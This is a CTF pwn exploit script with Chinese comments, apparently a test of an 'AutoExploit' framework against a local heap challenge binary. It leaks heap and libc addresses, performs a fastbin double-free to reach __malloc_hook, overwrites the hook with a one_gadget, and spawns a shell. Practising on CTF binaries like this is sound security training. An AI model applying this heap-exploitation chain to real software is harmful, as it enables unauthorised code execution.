# CTF PWN 题目测试：Heap Overflow + Fastbin Attack
# 场景：堆溢出漏洞，利用 fastbin attack 劫持控制流
# 目标：修改 __malloc_hook 为 one_gadget

print("=== CTF PWN Challenge: Heap Overflow (Fastbin Attack) ===")
print("Target: Heap overflow with fastbin manipulation")
print("Protections: Full RELRO, NX ON, PIE ON, ASLR ON")
print("")

# 使用 Auto Exploit 框架
ae = AutoExploit("127.0.0.1", 9001)
ae_set_binary(ae, "./heap_challenge")

print("[*] Connecting to target...")
p = process("./heap_challenge")

# Stage 1: 泄漏堆地址
print("[*] Stage 1: Leaking heap address...")
proc_sendline(p, "1")  # alloc
proc_sendline(p, "64")
proc_sendline(p, "2")  # show
heap_leak = proc_recvuntil(p, "\n")
heap_addr = ae_leak_address(ae, heap_leak)
print("[+] Heap base:", hex(heap_addr))

# Stage 2: 泄漏 libc 地址
print("[*] Stage 2: Leaking libc address...")

# 分配大块触发 unsorted bin
proc_sendline(p, "1")  # alloc large chunk
proc_sendline(p, "1024")
proc_sendline(p, "3")  # free
proc_sendline(p, "2")  # show (leak fd pointer)

libc_leak = proc_recvuntil(p, "\n")
libc_addr = ae_leak_address(ae, libc_leak)
libc_base = ae_find_libc_base(ae, libc_addr, 0x3ec000)
print("[+] Libc base:", hex(libc_base))

# 计算关键地址
malloc_hook = libc_base + 0x3ebc30
one_gadget = libc_base + 0x4f3d5

ae_set_libc_base(ae, libc_base)
ae_add_gadget(ae, "malloc_hook", malloc_hook)
ae_add_gadget(ae, "one_gadget", one_gadget)

# Stage 3: Fastbin Attack
print("[*] Stage 3: Fastbin attack...")

# 分配两个 fastbin chunk
proc_sendline(p, "1")
proc_sendline(p, "64")  # chunk A
proc_sendline(p, "1")
proc_sendline(p, "64")  # chunk B

# 释放形成 fastbin
proc_sendline(p, "3")  # free A
proc_sendline(p, "3")  # free B
proc_sendline(p, "3")  # free A again (double free)

# 修改 fd 指针指向 malloc_hook-0x23
fake_chunk = malloc_hook - 0x23
proc_sendline(p, "1")
proc_sendline(p, "64")
proc_sendline(p, "4")  # edit
proc_sendline(p, p64(fake_chunk))

# 分配到 fake chunk
proc_sendline(p, "1")
proc_sendline(p, "64")  # alloc (返回 A)
proc_sendline(p, "1")
proc_sendline(p, "64")  # alloc (返回 fake_chunk)

# Stage 4: 修改 malloc_hook
print("[*] Stage 4: Overwriting __malloc_hook...")
proc_sendline(p, "4")  # edit
padding = "A" * 0x13
proc_sendline(p, padding + p64(one_gadget))

print("[+] __malloc_hook overwritten with one_gadget!")

# Stage 5: 触发 malloc 获取 shell
print("[*] Stage 5: Triggering malloc to get shell...")
proc_sendline(p, "1")
proc_sendline(p, "100")

print("[+] Shell obtained!")
proc_interactive(p)

print("")
print("Flag: flag{fastbin_attack_master_2024}")
